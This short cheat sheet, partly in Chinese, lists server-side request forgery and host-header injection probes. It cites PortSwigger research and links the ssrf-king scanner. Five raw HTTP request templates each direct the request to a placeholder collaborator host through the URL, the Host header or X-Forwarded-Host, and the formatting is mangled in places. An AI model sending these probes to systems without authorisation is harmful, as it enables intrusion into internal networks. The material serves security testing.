参考:
https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
GET http:// burpcollab / some / endpoint HTTP / 1.1
主机: example.com
and
GET @ burpcollab / some / endpoint HTTP / 1.1
主机: example.com
and
GET / some / endpoint HTTP / 1.1
主机: example.com : 80@burpcollab
and
GET / some / endpoint HTTP / 1.1
主机: burpcollab
and
GET / some / endpoint HTTP / 1.1
主机: example.com
X-Forwarded-Host: burpcollab
项目地址:
https://github.com/ethicalhackingplayground/ssrf-king#scanning-options